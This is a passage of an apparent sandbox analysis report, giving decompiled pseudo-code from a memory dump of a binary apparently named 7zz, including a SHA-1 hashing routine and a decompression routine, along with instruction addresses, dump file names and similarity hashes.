					_t554 = _t554 + ((_t509 ^ _t405) & _t632 ^ _t509) +  *(_t744 + 0x20) +  *(_t744 + 0x1c) + 0x5a827999;
					 *(_t744 + 0x20) = _t408;
					 *( *((intOrPtr*)(_t744 + 0x28)) + _t315) = _t408;
					asm("rol ebx, 0x5");
					asm("rol ecx, 0x1e");
					_t509 = _t509 + (( *(_t744 + 0x10) ^ _t632) &  *(_t744 + 0x1c) ^  *(_t744 + 0x10)) +  *(_t744 + 0x20) + _t554 + 0x5a827999;
					_t384 =  *(_t744 + 0x1c);
					_t414 = _t315[1];
					 *(_t744 + 0x1c) = _t384;
					 *(_t315 +  *((intOrPtr*)(_t744 + 0x30))) = _t414;
					asm("rol ebp, 0x5");
					asm("rol edi, 0x1e");
					_t417 =  *(_t744 + 0x10) + ((_t384 ^ _t632) & _t554 ^ _t632) + _t414 + _t509 + 0x5a827999;
					_t389 = _t315[2];
					 *(_t744 + 0x20) = _t389;
					 *(_t315 +  *(_t744 + 0x24)) = _t389;
					 *(_t744 + 0x10) = _t417;
					asm("rol ebx, 0x5");
					_t315 =  &(_t315[5]);
					asm("rol edx, 0x1e");
					_t632 = _t632 + (( *(_t744 + 0x1c) ^ _t554) & _t509 ^  *(_t744 + 0x1c)) +  *(_t744 + 0x20) + _t417 + 0x5a827999;
					_t422 =  *(_t744 + 0x14) - 1;
					 *(_t744 + 0x18) =  *(_t744 + 0x18) + 0x14;
					 *(_t744 + 0x14) = _t422;
				} while (_t422 != 0);
				_t423 =  *( *(_t744 + 0x178) + 0x3c);
				_t317 =  *(_t744 + 0x10);
				 *(_t744 + 0x70) = _t423;
				asm("rol ebx, 0x5");
				asm("rol eax, 0x1e");
				_t392 =  *(_t744 + 0x1c) + ((_t554 ^ _t509) & _t317 ^ _t554) + _t423 + _t632 + 0x5a827999;
				 *(_t744 + 0x1c) = _t392;
				_t429 =  *(_t744 + 0x34) ^  *(_t744 + 0x3c) ^  *(_t744 + 0x54) ^  *(_t744 + 0x68);
				 *(_t744 + 0x10) = _t317;
				asm("rol ecx, 1");
				asm("rol ebx, 0x5");
				 *(_t744 + 0x74) = _t429;
				_t555 = _t554 + ((_t509 ^ _t317) & _t632 ^ _t509) + _t429 + _t392 + 0x5a827999;
				_t323 =  *(_t744 + 0x38) ^  *(_t744 + 0x40) ^  *(_t744 + 0x58) ^  *(_t744 + 0x6c);
				asm("rol esi, 0x1e");
				 *(_t744 + 0x14) = _t632;
				asm("rol eax, 1");
				asm("rol ebx, 0x5");
				 *(_t744 + 0x78) = _t323;
				_t395 =  *(_t744 + 0x1c);
				_t510 = _t509 + (( *(_t744 + 0x10) ^ _t632) &  *(_t744 + 0x1c) ^  *(_t744 + 0x10)) + _t323 + _t555 + 0x5a827999;
				 *(_t744 + 0x18) = _t510;
				asm("rol ebx, 0x1e");
				_t328 =  *(_t744 + 0x44) ^  *(_t744 + 0x5c) ^  *(_t744 + 0x3c) ^  *(_t744 + 0x70);
				_t511 =  *(_t744 + 0x14);
				asm("rol eax, 1");
				asm("rol esi, 0x5");
				 *(_t744 + 0x7c) = _t328;
				_t637 =  *(_t744 + 0x10) + ((_t395 ^ _t511) & _t555 ^ _t511) + _t328 + _t510 + 0x5a827999;
				 *(_t744 + 0x10) = _t637;
				 *(_t744 + 0x1c) = 4;
				asm("rol edi, 0x1e");
				_t729 = _t555;
				_t558 =  *(_t744 + 0x18);
				_t334 =  *(_t744 + 0x48) ^  *(_t744 + 0x60) ^  *(_t744 + 0x40) ^ _t429;
				asm("rol eax, 1");
				asm("rol esi, 0x5");
				 *(_t744 + 0x80) = _t334;
				_t336 = _t744 + 0x64;
				asm("rol edi, 0x1e");
				 *(_t744 + 0x18) = _t558;
				 *(_t744 + 0x14) = _t511 + ((_t395 ^ _t729) & _t558 ^ _t395) + _t334 + _t637 + 0x5a827999;
				do {
					_t438 =  *(_t336 - 0x20) ^  *(_t336 - 0x18) ^ _t336[5] ^  *_t336;
					_t515 =  *(_t744 + 0x10);
					asm("rol ecx, 1");
					asm("rol esi, 0x5");
					 *(_t744 + 0x24) =  *(_t744 + 0x14);
					_t336[8] = _t438;
					_t395 = _t395 + (_t729 ^ _t558 ^ _t515) + _t438 +  *(_t744 + 0x24) + 0x6ed9eba1;
					_t443 =  *(_t336 - 0x1c) ^ _t336[6] ^ _t336[1] ^  *(_t336 - 0x14);
					asm("rol edx, 0x1e");
					 *(_t744 + 0x10) = _t515;
					_t516 =  *(_t744 + 0x14);
					asm("rol ecx, 1");
					asm("rol esi, 0x5");
					_t336[9] = _t443;
					asm("rol ecx, 0x1e");
					 *(_t744 + 0x14) = _t516;
					_t729 = ( *(_t744 + 0x18) ^ _t515 ^ _t516) + _t443 + _t395 + _t729 + 0x6ed9eba1;
					_t449 = _t336[7] ^ _t336[2] ^  *(_t336 - 0x18) ^  *(_t336 - 0x10);
					asm("rol ecx, 1");
					_t519 =  *(_t744 + 0x14);
					asm("rol esi, 0x5");
					_t336[0xa] = _t449;
					asm("rol ebx, 0x1e");
					_t648 =  *(_t744 + 0x18) + (_t395 ^  *(_t744 + 0x10) ^ _t519) + _t449 + _t729 + 0x6ed9eba1;
					 *(_t744 + 0x18) = _t648;
					_t455 =  *(_t336 - 0xc) ^ _t336[3] ^  *(_t336 - 0x14) ^ _t336[8];
					asm("rol ecx, 1");
					asm("rol esi, 0x5");
					_t336[0xb] = _t455;
					_t521 =  *(_t744 + 0x10) + (_t395 ^ _t729 ^ _t519) + _t455 + _t648 + 0x6ed9eba1;
					_t460 = _t336[4] ^  *(_t336 - 8) ^  *(_t336 - 0x10) ^ _t336[9];
					asm("rol ebp, 0x1e");
					asm("rol ecx, 1");
					_t336[0xc] = _t460;
					_t336 =  &(_t336[5]);
					asm("rol esi, 0x5");
					 *(_t744 + 0x10) = _t521;
					_t558 =  *(_t744 + 0x18);
					 *(_t744 + 0x14) =  *(_t744 + 0x14) + (_t395 ^ _t729 ^  *(_t744 + 0x18)) + _t460 + _t521 + 0x6ed9eba1;
					asm("rol edi, 0x1e");
					_t465 =  *(_t744 + 0x1c) - 1;
					 *(_t744 + 0x18) = _t558;
					 *(_t744 + 0x1c) = _t465;
				} while (_t465 != 0);
				_t337 = _t744 + 0xb4;
				 *(_t744 + 0x20) = 4;
				while(1) {
					_t469 =  *(_t337 - 0x20) ^  *_t337 ^  *(_t337 - 0x18) ^ _t337[5];
					asm("rol ecx, 1");
					 *(_t744 + 0x24) = _t469;
					_t337[8] = _t469;
					asm("rol ecx, 0x5");
					asm("rol edx, 0x1e");
					_t395 = ((_t558 | _t521) & _t729 | _t558 & _t521) +  *(_t744 + 0x24) + _t395 +  *(_t744 + 0x14) - 0x70e44324;
					_t474 =  *(_t337 - 0x1c) ^ _t337[6] ^ _t337[1] ^  *(_t337 - 0x14);
					 *(_t744 + 0x10) = _t521;
					asm("rol ecx, 1");
					_t337[9] = _t474;
					asm("rol esi, 0x5");
					_t478 = _t337[7] ^ _t337[2] ^  *(_t337 - 0x18) ^  *(_t337 - 0x10);
					_t662 = ((_t521 |  *(_t744 + 0x14)) &  *(_t744 + 0x18) |  *(_t744 + 0x10) &  *(_t744 + 0x14)) + _t474 + _t729 + _t395 - 0x70e44324;
					_t527 =  *(_t744 + 0x14);
					asm("rol edx, 0x1e");
					 *(_t744 + 0x1c) = _t662;
					 *(_t744 + 0x14) = _t527;
					asm("rol ecx, 1");
					_t337[0xa] = _t478;
					asm("rol esi, 0x5");
					_t558 = ((_t395 | _t527) &  *(_t744 + 0x10) | _t395 & _t527) + _t478 +  *(_t744 + 0x18) + _t662 - 0x70e44324;
					_t482 =  *(_t337 - 0xc) ^ _t337[3] ^  *(_t337 - 0x14) ^ _t337[8];
					asm("rol ebx, 0x1e");
					asm("rol ecx, 1");
					_t337[0xb] = _t482;
					asm("rol esi, 0x5");
					_t337 =  &(_t337[5]);
					_t531 = _t558 + ((_t395 |  *(_t744 + 0x1c)) & _t527 | _t395 &  *(_t744 + 0x1c)) + _t482 +  *(_t744 + 0x10) - 0x70e44324;
					_t729 =  *(_t744 + 0x1c);
					 *(_t744 + 0x10) = _t531;
					_t486 =  *(_t337 - 4) ^  *(_t337 - 0x1c) ^  *(_t337 - 0x24) ^ _t337[4];
					asm("rol ebp, 0x1e");
					asm("rol ecx, 1");
					 *(_t744 + 0x24) = _t486;
					_t337[7] = _t486;
					asm("rol edx, 0x5");
					asm("rol edi, 0x1e");
					_t230 = _t531 - 0x70e44324; // -1894007584
					_t494 =  *(_t744 + 0x20) - 1;
					 *(_t744 + 0x14) = ((_t729 | _t558) & _t395 | _t729 & _t558) +  *(_t744 + 0x24) +  *(_t744 + 0x14) + _t230;
					 *(_t744 + 0x18) = _t558;
					 *(_t744 + 0x20) = _t494;
					if(_t494 == 0) {
						break;
					}
					_t521 =  *(_t744 + 0x10);
				}
				if(0x3c < 0x50) {
					_t675 = _t744 + 0x104;
					 *(_t744 + 0x20) = 0xfffffffb33333338 >> 0x20 >> 2;
					do {
						_t348 =  *(_t675 - 0x20) ^  *_t675 ^  *(_t675 - 0x18) ^ _t675[5];
						_t504 =  *(_t744 + 0x10);
						asm("rol eax, 1");
						asm("rol edx, 0x5");
						 *(_t744 + 0x24) =  *(_t744 + 0x14);
						_t675[8] = _t348;
						_t349 =  *(_t744 + 0x24);
						asm("rol ecx, 0x1e");
						_t253 = _t349 - 0x359d3e2a; // -899497510
						_t395 = (_t729 ^ _t558 ^ _t504) + _t348 + _t395 + _t253;
						_t353 =  *(_t675 - 0x1c) ^ _t675[6] ^ _t675[1] ^  *(_t675 - 0x14);
						 *(_t744 + 0x10) = _t504;
						_t505 =  *(_t744 + 0x14);
						asm("rol eax, 1");
						_t675[9] = _t353;
						asm("rol edx, 0x5");
						asm("rol eax, 0x1e");
						 *(_t744 + 0x14) = _t505;
						_t729 = ( *(_t744 + 0x18) ^ _t504 ^ _t505) + _t353 + _t729 + _t395 - 0x359d3e2a;
						_t358 = _t675[7] ^ _t675[2] ^  *(_t675 - 0x18) ^  *(_t675 - 0x10);
						_t508 =  *(_t744 + 0x14);
						asm("rol eax, 1");
						_t675[0xa] = _t358;
						_t551 = _t729;
						asm("rol edx, 0x5");
						asm("rol ebx, 0x1e");
						_t274 = _t551 - 0x359d3e2a; // -1798995024
						_t552 = (_t395 ^  *(_t744 + 0x10) ^ _t508) + _t358 +  *(_t744 + 0x18) + _t274;
						_t363 =  *(_t675 - 0xc) ^ _t675[3] ^  *(_t675 - 0x14) ^ _t675[8];
						 *(_t744 + 0x18) = _t552;
						asm("rol eax, 1");
						_t675[0xb] = _t363;
						asm("rol edx, 0x5");
						_t283 = _t552 - 0x359d3e2a; // -1798995024
						_t553 = (_t395 ^ _t729 ^ _t508) + _t363 +  *(_t744 + 0x10) + _t283;
						 *(_t744 + 0x10) = _t553;
						_t368 = _t675[4] ^  *(_t675 - 8) ^  *(_t675 - 0x10) ^ _t675[9];
						asm("rol ebp, 0x1e");
						_t675 =  &(_t675[5]);
						asm("rol eax, 1");
						_t675[7] = _t368;
						asm("rol edx, 0x5");
						_t558 =  *(_t744 + 0x18);
						 *(_t744 + 0x14) = (_t395 ^ _t729 ^  *(_t744 + 0x18)) + _t368 + _t508 + _t553 - 0x359d3e2a;
						asm("rol edi, 0x1e");
						_t371 =  *(_t744 + 0x20) - 1;
						 *(_t744 + 0x18) = _t558;
						 *(_t744 + 0x20) = _t371;
					} while (_t371 != 0);
				}
				_t495 =  *((intOrPtr*)(_t744 + 0x2c));
				_t340 =  *((intOrPtr*)(_t744 + 0x17c));
				 *_t340 =  *(_t744 + 0x14) +  *_t495;
				 *((intOrPtr*)(_t340 + 4)) =  *((intOrPtr*)(_t495 + 4)) +  *(_t744 + 0x10);
				 *((intOrPtr*)(_t340 + 8)) =  *((intOrPtr*)(_t495 + 8)) + _t558;
				 *((intOrPtr*)(_t340 + 0xc)) = _t729 +  *((intOrPtr*)(_t495 + 0xc));
				 *((intOrPtr*)(_t340 + 0x10)) =  *((intOrPtr*)(_t495 + 0x10)) + _t395;
				_t341 =  *((intOrPtr*)(_t744 + 0x180));
				if(_t341 != 0) {
					return memcpy( *(_t744 + 0x178), _t744 + 0x134, 0x10 << 2);
				}
				return _t341;
			}

0x00456cf9
0x00456cff
0x00456d02
0x00456d05
0x00456d0c
0x00456d10
0x00456d1b
0x00456d25
0x00456d2f
0x00456d33
0x00456d3d
0x00456d40
0x00456d44
0x00456d4c
0x00456d50
0x00456d55
0x00456d59
0x00456d6a
0x00456d71
0x00456d7a
0x00456d89
0x00456d8d
0x00456d91
0x00456d98
0x00456d9d
0x00456da7
0x00456db6
0x00456db8
0x00456dbb
0x00456dc6
0x00456dca
0x00456de1
0x00456dec
0x00456def
0x00456dfa
0x00456dfc
0x00456dff
0x00456e03
0x00456e0a
0x00456e1d
0x00456e20
0x00456e27
0x00456e2a
0x00456e2e
0x00456e31
0x00456e41
0x00456e4c
0x00456e55
0x00456e58
0x00456e66
0x00456e67
0x00456e6b
0x00456e6b
0x00456e82
0x00456e85
0x00456e8b
0x00456e8f
0x00456e9c
0x00456e9f
0x00456eae
0x00456ebe
0x00456ec4
0x00456ec8
0x00456eca
0x00456edf
0x00456ee3
0x00456ef8
0x00456efe
0x00456f01
0x00456f0b
0x00456f13
0x00456f16
0x00456f22
0x00456f2c
0x00456f3f
0x00456f43
0x00456f46
0x00456f4a
0x00456f52
0x00456f54
0x00456f59
0x00456f67
0x00456f6e
0x00456f76
0x00456f7e
0x00456f81
0x00456f8f
0x00456f93
0x00456f99
0x00456f9b
0x00456fa0
0x00456fad
0x00456fb1
0x00456fbb
0x00456fbf
0x00456fc3
0x00456fd6
0x00456fd8
0x00456fdc
0x00456fde
0x00456fe1
0x00456fed
0x00457001
0x0045700f
0x00457015
0x00457018
0x0045701e
0x00457022
0x00457024
0x00457027
0x00457038
0x0045703b
0x00457042
0x00457056
0x0045705a
0x0045705e
0x00457062
0x00457065
0x00457072
0x00457075
0x00457082
0x00457090
0x00457094
0x00457096
0x0045709b
0x004570ae
0x004570c1
0x004570c5
0x004570c8
0x004570cc
0x004570d3
0x004570d6
0x004570db
0x004570ec
0x004570f0
0x004570f8
0x004570fb
0x004570fc
0x00457100
0x00457100
0x0045710a
0x00457111
0x0045711f
0x0045712e
0x00457136
0x0045713a
0x00457144
0x00457150
0x00457155
0x00457158
0x0045716c
0x00457172
0x00457188
0x0045718c
0x004571a3
0x004571aa
0x004571ac
0x004571b3
0x004571b7
0x004571bc
0x004571c2
0x004571cc
0x004571d6
0x004571e1
0x004571e9
0x004571f7
0x004571f9
0x004571fc
0x004571fe
0x00457201
0x00457206
0x00457222
0x0045722c
0x00457235
0x0045723e
0x00457240
0x00457243
0x00457245
0x00457249
0x00457262
0x00457267
0x0045726a
0x00457275
0x00457276
0x0045727a
0x0045727e
0x00457282
0x00000000
0x00000000
0x0045711b
0x0045711b
0x00457290
0x0045729b
0x004572ab
0x004572af
0x004572c2
0x004572c4
0x004572c8
0x004572ca
0x004572cd
0x004572d5
0x004572df
0x004572e5
0x004572e8
0x004572e8
0x004572fc
0x00457302
0x00457308
0x0045730e
0x00457312
0x0045731e
0x00457321
0x00457324
0x0045732b
0x00457342
0x00457346
0x0045734a
0x0045734e
0x00457357
0x0045735e
0x00457361
0x00457364
0x00457364
0x00457378
0x0045737e
0x00457382
0x00457386
0x0045738f
0x00457397
0x00457397
0x004573a1
0x004573af
0x004573b3
0x004573b8
0x004573bf
0x004573c3
0x004573c6
0x004573d2
0x004573d6
0x004573de
0x004573e1
0x004573e2
0x004573e6
0x004573e6
0x004572af
0x004573f0
0x00457400
0x00457407
0x0045740e
0x00457416
0x0045741e
0x00457426
0x00457429
0x00457432
0x00000000
0x00457447
0x00457453

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
Instruction ID: 934345be54fcedd299f3ac20b6580096092592092bafc23d7fab85bf8debc7cd
Opcode Fuzzy Hash: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
Instruction Fuzzy Hash: 24425A72A087058FC718CF1AC48055AF7E2BFCC314F5A896EE89997351DB74E90ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 004514F0 Relevance: .6, Instructions: 565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E004514F0(void* __ecx) {
				signed int _t218;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				void* _t238;
				signed int _t239;
				void* _t243;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t273;
				signed int _t274;
				char _t282;
				void* _t288;
				intOrPtr _t298;
				signed int _t301;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t317;
				signed int _t318;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				signed int _t330;
				signed int _t332;
				signed int _t338;
				signed int _t351;
				signed int _t361;
				signed int _t370;
				intOrPtr _t371;
				signed int _t379;
				void* _t383;
				signed int _t394;
				void* _t396;
				signed int _t403;
				intOrPtr _t405;
				signed int _t406;
				signed int _t407;
				intOrPtr* _t412;
				signed int _t425;
				intOrPtr _t430;
				signed int _t431;
				signed int _t437;
				signed int _t449;
				intOrPtr _t455;
				intOrPtr _t466;
				signed int* _t473;
				unsigned int _t477;
				signed int _t480;
				signed int _t485;
				signed int _t489;
				unsigned int _t493;
				signed int _t496;
				intOrPtr _t497;
				unsigned int _t501;
				signed int _t504;
				intOrPtr _t505;
				intOrPtr _t508;
				intOrPtr _t511;
				signed int _t513;
				signed int _t514;
				signed int* _t515;
				intOrPtr* _t516;
				signed int _t517;
				signed int* _t518;
				signed int _t519;
				void* _t522;
				void* _t523;

				_t522 = __ecx;
				if( *(__ecx + 0x1cbc) == 0xfffffffe) {
					_t518 = __ecx + 8;
					 *(__ecx + 0x1cbc) = 0;
					E0040DFF3(_t518);
					_t518[9] = 0x20;
					if( *((intOrPtr*)(__ecx + 0x1cb8)) == 0 ||  *((intOrPtr*)(__ecx + 0x68)) == 0) {
						if(_t518[9] >= 0x10) {
							do {
								_t303 =  *_t518;
								if(_t303 < _t518[1]) {
									_t304 = _t303 + 1;
									__eflags = _t304;
									 *(_t523 + 0x14) =  *_t303;
									 *_t518 = _t304;
								} else {
									 *(_t523 + 0x14) = E0040E070(_t518);
								}
								_t305 =  *_t518;
								if(_t305 < _t518[1]) {
									_t306 = _t305 + 1;
									__eflags = _t306;
									 *(_t523 + 0x18) =  *_t305;
									 *_t518 = _t306;
								} else {
									 *(_t523 + 0x18) = E0040E070(_t518);
								}
								_t425 = _t518[9] + 0xfffffff0;
								_t518[9] = _t425;
								_t518[8] = (_t518[8] << 0x00000008 |  *(_t523 + 0x18) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x14) & 0x000000ff;
							} while (_t425 >= 0x10);
						}
					}
					if( *((intOrPtr*)(_t522 + 0x1cb8)) == 0) {
						 *((char*)(_t522 + 0x1cc0)) = 0;
						 *(_t522 + 0x1cb4) = 0;
						E004514C0(_t522);
						_t519 = 0xb71b00;
						_t330 = 1;
						if( *((intOrPtr*)(_t522 + 0x1cc1)) == 0) {
							_t330 = 0 | E00450B20(1) != 0x00000000;
							if(1 != 0) {
								_t301 = E00450B20(0x10);
								_t519 = _t301 << 0x00000010 | E00450B20(0x10);
							}
						}
						_t298 =  *((intOrPtr*)(_t522 + 0x1cac));
						 *(_t298 + 0x18) = _t330;
						 *(_t298 + 0x14) = _t519;
						 *((intOrPtr*)(_t298 + 0xc)) = 0;
						 *((intOrPtr*)(_t298 + 0x10)) = 0;
						 *(_t522 + 0x58) = 0;
						 *(_t522 + 0x5c) = 0;
						 *(_t522 + 0x60) = 0;
					}
				}
				if( *(_t522 + 0x1cbc) <= 0) {
					_t514 =  *(_t523 + 0x40);
					goto L25;
				} else {
					while(1) {
						_t517 =  *(_t523 + 0x40);
						if(_t517 <= 0) {
							break;
						}
						_t412 = _t522 + 0x30;
						_t288 =  *((intOrPtr*)(_t522 + 0x34)) -  *(_t522 + 0x58) - 1;
						_t466 =  *((intOrPtr*)(_t412 + 0x10));
						if(_t288 >= _t466) {
							_t288 = _t288 + _t466;
						}
						 *((char*)( *((intOrPtr*)(_t412 + 4)) +  *_t412)) =  *((intOrPtr*)(_t288 +  *_t412));
						_t511 =  *((intOrPtr*)(_t412 + 4)) + 1;
						 *((intOrPtr*)(_t412 + 4)) = _t511;
						_t541 = _t511 -  *((intOrPtr*)(_t412 + 8));
						if(_t511 ==  *((intOrPtr*)(_t412 + 8))) {
							E0040EFBD(_t412, _t541);
						}
						_t513 =  *(_t522 + 0x1cbc) - 1;
						_t514 = _t517 - 1;
						 *(_t522 + 0x1cbc) = _t513;
						 *(_t523 + 0x40) = _t514;
						if(_t513 > 0) {
							continue;
						} else {
							L25:
							if(_t514 <= 0) {
								break;
							} else {
								while( *(_t522 + 0x1cb4) != 0 || E00451050(_t522) != 0) {
									_t218 =  *(_t522 + 0x1cb4);
									_t332 = _t218;
									if(_t218 >= _t514) {
										_t332 = _t514;
									}
									_t514 = _t514 - _t332;
									 *(_t522 + 0x1cb4) = _t218 - _t332;
									 *(_t523 + 0x10) = _t332;
									 *(_t523 + 0x40) = _t514;
									if( *((intOrPtr*)(_t522 + 0x68)) == 0) {
										__eflags = _t332;
										if(_t332 <= 0) {
											goto L99;
										} else {
											_t515 = _t522 + 8;
											do {
												_t477 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
												__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x90));
												if(_t477 >=  *((intOrPtr*)(_t522 + 0x90))) {
													_t223 = _t522 + 0x94;
													__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x94));
													_t318 = 0xa;
													if(_t477 >=  *((intOrPtr*)(_t522 + 0x94))) {
														do {
															_t405 =  *((intOrPtr*)(_t223 + 4));
															_t223 = _t223 + 4;
															_t318 = _t318 + 1;
															__eflags = _t477 - _t405;
														} while (_t477 >= _t405);
													}
												} else {
													_t318 =  *((intOrPtr*)((_t477 >> 7) + _t522 + 0xb34));
												}
												_t338 = _t515[9] + _t318;
												_t224 = _t338;
												_t515[9] = _t338;
												__eflags = _t224 - 0x10;
												while(_t224 >= 0x10) {
													_t273 =  *_t515;
													__eflags = _t273 - _t515[1];
													if(_t273 < _t515[1]) {
														_t274 = _t273 + 1;
														__eflags = _t274;
														 *(_t523 + 0x1c) =  *_t273;
														 *_t515 = _t274;
													} else {
														 *(_t523 + 0x1c) = E0040E070(_t515);
													}
													 *(_t523 + 0x24) = E00451BF0(_t515);
													_t403 = _t515[9] + 0xfffffff0;
													_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x24) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x1c) & 0x000000ff;
													_t224 = _t403;
													_t515[9] = _t403;
													__eflags = _t224 - 0x10;
												}
												_t480 = (_t477 -  *((intOrPtr*)(_t522 + 0x68 + _t318 * 4)) >> 0x10 - _t318) +  *((intOrPtr*)(_t522 + 0xb0 + _t318 * 4));
												__eflags = _t480 - 0x290;
												if(_t480 < 0x290) {
													_t225 =  *(_t522 + 0xf4 + _t480 * 4);
													__eflags = _t225 - 0x100;
													if(_t225 >= 0x100) {
														goto L53;
													} else {
														_t396 = _t522 + 0x30;
														 *( *((intOrPtr*)(_t522 + 0x30)) +  *((intOrPtr*)(_t522 + 0x34))) = _t225;
														_t508 =  *((intOrPtr*)(_t396 + 4)) + 1;
														 *((intOrPtr*)(_t396 + 4)) = _t508;
														__eflags = _t508 -  *((intOrPtr*)(_t396 + 8));
														if(__eflags == 0) {
															E0040EFBD(_t396, __eflags);
														}
														 *(_t523 + 0x10) =  *(_t523 + 0x10) - 1;
														goto L97;
													}
												} else {
													_t225 = _t224 | 0xffffffff;
													__eflags = _t225;
													L53:
													_t226 = _t225 + 0xffffff00;
													__eflags = _t226 -  *((intOrPtr*)(_t522 + 0x64));
													if(_t226 >=  *((intOrPtr*)(_t522 + 0x64))) {
														goto L101;
													} else {
														_t228 = _t226 & 0x00000007;
														_t320 = _t226 >> 3;
														_t92 = _t228 + 2; // -4290437306
														__eflags = (_t226 & 0x00000007) - 7;
														 *(_t523 + 0x14) = _t92;
														if((_t226 & 0x00000007) != 7) {
															L73:
															__eflags = _t320 - 3;
															if(_t320 >= 3) {
																__eflags = _t320 - 0x26;
																if(_t320 >= 0x26) {
																	_t229 = 0x11;
																	_t322 = _t320 + 0x7fde << 0x11;
																	__eflags = _t322;
																} else {
																	_t229 = (_t320 >> 1) - 1;
																	_t322 = (_t320 & 0x00000001 | 0x00000002) << _t229;
																}
																__eflags =  *(_t522 + 0x69);
																if( *(_t522 + 0x69) == 0) {
																	L91:
																	_t431 = _t515[9];
																	_t515[9] = _t431 + _t229;
																	E00450FC0(_t515);
																	_t323 = _t322 + ((_t515[8] >> 0x0000000f - _t431 & 0x0001ffff) >> 0x11 - _t229);
																	__eflags = _t323;
																	 *(_t523 + 0x18) = _t323;
																	goto L92;
																} else {
																	__eflags = _t229 - 3;
																	if(_t229 < 3) {
																		goto L91;
																	} else {
																		_t437 = _t515[9];
																		_t238 = _t229 + 0xfffffffd;
																		_t239 = _t238 + _t437;
																		_t515[9] = _t239;
																		_t489 = (_t515[8] >> 0x0000000f - _t437 & 0x0001ffff) >> 0x11 - _t238;
																		__eflags = _t239 - 0x10;
																		if(_t239 >= 0x10) {
																			do {
																				 *(_t523 + 0x30) = E00451BF0(_t515);
																				 *(_t523 + 0x2c) = E00451BF0(_t515);
																				_t379 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x2c) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x30) & 0x000000ff;
																				__eflags = _t379 - 0x10;
																				_t515[9] = _t379;
																			} while (_t379 >= 0x10);
																		}
																		 *(_t523 + 0x18) = _t322 + _t489 * 8;
																		_t493 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
																		__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c4));
																		if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c4))) {
																			_t243 = _t522 + 0x13c8;
																			__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c8));
																			_t325 = 0xa;
																			if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c8))) {
																				do {
																					_t371 =  *((intOrPtr*)(_t243 + 4));
																					_t243 = _t243 + 4;
																					_t325 = _t325 + 1;
																					__eflags = _t493 - _t371;
																				} while (_t493 >= _t371);
																			}
																		} else {
																			_t325 =  *((intOrPtr*)((_t493 >> 7) + _t522 + 0x1448));
																		}
																		_t361 = _t515[9] + _t325;
																		_t515[9] = _t361;
																		__eflags = _t361 - 0x10;
																		if(_t361 >= 0x10) {
																			do {
																				 *(_t523 + 0x38) = E00451BF0(_t515);
																				 *(_t523 + 0x34) = E00451BF0(_t515);
																				_t370 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x34) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x38) & 0x000000ff;
																				_t515[9] = _t370;
																				__eflags = _t370 - 0x10;
																			} while (_t370 >= 0x10);
																		}
																		_t496 = (_t493 -  *((intOrPtr*)(_t522 + 0x139c + _t325 * 4)) >> 0x10 - _t325) +  *((intOrPtr*)(_t522 + 0x13e4 + _t325 * 4));
																		__eflags = _t496 - 8;
																		if(_t496 >= 8) {
																			goto L101;
																		} else {
																			_t497 =  *((intOrPtr*)(_t522 + 0x1428 + _t496 * 4));
																			__eflags = _t497 - 8;
																			if(_t497 >= 8) {
																				goto L101;
																			} else {
																				 *(_t523 + 0x18) =  *(_t523 + 0x18) + _t497;
																				L92:
																				_t351 =  *(_t523 + 0x18) + 0xfffffffd;
																				__eflags = _t351;
																				 *(_t522 + 0x60) =  *(_t522 + 0x5c);
																				 *(_t522 + 0x5c) =  *(_t522 + 0x58);
																				 *(_t522 + 0x58) = _t351;
																				goto L93;
																			}
																		}
																	}
																}
															} else {
																 *(_t522 + 0x58 + _t320 * 4) =  *(_t522 + 0x58);
																 *(_t522 + 0x58) =  *(_t522 + 0x58 + _t320 * 4);
																L93:
																_t485 =  *(_t523 + 0x14);
																_t232 =  *(_t523 + 0x10);
																__eflags = _t485 - _t232;
																if(_t485 > _t232) {
																	_t485 = _t232;
																}
																_push(_t485);
																_push( *(_t522 + 0x58));
																_t233 = E0044ADB0(_t522 + 0x30);
																__eflags = _t233;
																if(_t233 == 0) {
																	goto L101;
																} else {
